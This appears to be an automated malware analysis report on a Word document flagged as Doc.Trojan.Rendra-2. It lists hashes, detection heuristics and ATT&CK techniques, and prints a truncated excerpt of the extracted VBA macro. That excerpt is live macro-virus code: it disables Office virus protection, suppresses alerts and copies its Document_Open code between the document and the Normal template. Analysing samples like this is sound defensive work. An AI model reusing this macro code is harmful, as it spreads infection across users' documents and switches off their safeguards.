Doc.Trojan.Rendra-2 Office (OLE) malware analysis — malicious · f5e71766f1542adf

MALICIOUS

Office (OLE)

50.5 KB Created: 2009-08-22 12:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c9598ea3ac26609809632da8896e5bc8 SHA-1: a78598b98b893980814029b303f59919bb3b4813 SHA-256: f5e71766f1542adfe6cd27fbf64e228aa87d720faed1201debe8969ec8bc4f3b

120 Risk Score

Malware Insights

Doc.Trojan.Rendra-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Rendra-2. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon file opening. The macros are likely designed to download and execute a secondary payload, although the specific download URL or execution details are not directly visible in the provided script excerpt.

Heuristics 3

ClamAV: Doc.Trojan.Rendra-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Rendra-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33920 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	33920 bytes
SHA-256: `fc6ca7b578c1917d6854ed5ef106016ee87d36e24f98f77dea9b87bf3a391180`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() Dim objet As Variant Dim objet2 As Variant Dim feuille As Variant Dim Var_Start, Var_Start2 As Long Dim Var_Count, Var_Count2 As Long Dim TempString As String Dim Date1 As Date Dim Date2 As Date Dim Date3 As Date Date1 = "03/04/2000" Date2 = "10/05/2000" Date3 = "15/09/2000" On Error Resume Next Options.VirusProtection = False Application.DisplayAlerts = wdAlertsNone Set feuille = Application.ActiveDocument Set objet = feuille.VBProject.VBComponents.Item("ThisDocument") If Not objet.CodeModule.Find("{ - This function should never be deleted - } V2", 1, 1, 1, 1) Then For i = 1 To objet.CodeModule.CountOfLines objet.CodeModule.DeleteLines 1 Next Var_Start = objet.CodeModule.CountOfLines + 1 Set objet2 = NormalTemplate.VBProject.VBComponents.Item("ThisDocument") Var_Start2 = objet2.CodeModule.ProcBodyLine("Document_Open", vbext_pk_Proc) Var_Count2 = objet2.CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc) For i = Var_Start2 + 1 To Var_Count2 + Var_Start2 - 2 TempString = R ... (truncated)

SHA-256: fc6ca7b578c1917d6854ed5ef106016ee87d36e24f98f77dea9b87bf3a391180

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
                                                                                                    Private Sub Document_Close()
                                                                                                    Dim objet As Variant
                                                                                                    Dim objet2 As Variant
                                                                                                    Dim feuille As Variant
                                                                                                    Dim Var_Start, Var_Start2 As Long
                                                                                                    Dim Var_Count, Var_Count2 As Long
                                                                                                    Dim TempString As String
                                                                                                    Dim Date1 As Date
                                                                                                    Dim Date2 As Date
                                                                                                    Dim Date3 As Date
                                                                                                    Date1 = "03/04/2000"
                                                                                                    Date2 = "10/05/2000"
                                                                                                    Date3 = "15/09/2000"
                                                                                                    On Error Resume Next
                                                                                                    Options.VirusProtection = False
                                                                                                    Application.DisplayAlerts = wdAlertsNone
                                                                                                    Set feuille = Application.ActiveDocument
                                                                                                    Set objet = feuille.VBProject.VBComponents.Item("ThisDocument")
                                                                                                    If Not objet.CodeModule.Find("{ - This function should never be deleted -  } V2", 1, 1, 1, 1) Then
                                                                                                    For i = 1 To objet.CodeModule.CountOfLines
                                                                                                    objet.CodeModule.DeleteLines 1
                                                                                                    Next
                                                                                                    Var_Start = objet.CodeModule.CountOfLines + 1
                                                                                                    Set objet2 = NormalTemplate.VBProject.VBComponents.Item("ThisDocument")
                                                                                                    Var_Start2 = objet2.CodeModule.ProcBodyLine("Document_Open", vbext_pk_Proc)
                                                                                                    Var_Count2 = objet2.CodeModule.ProcCountLines("Document_Open", vbext_pk_Proc)
                                                                                                    For i = Var_Start2 + 1 To Var_Count2 + Var_Start2 - 2
                                                                                                    TempString = R
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.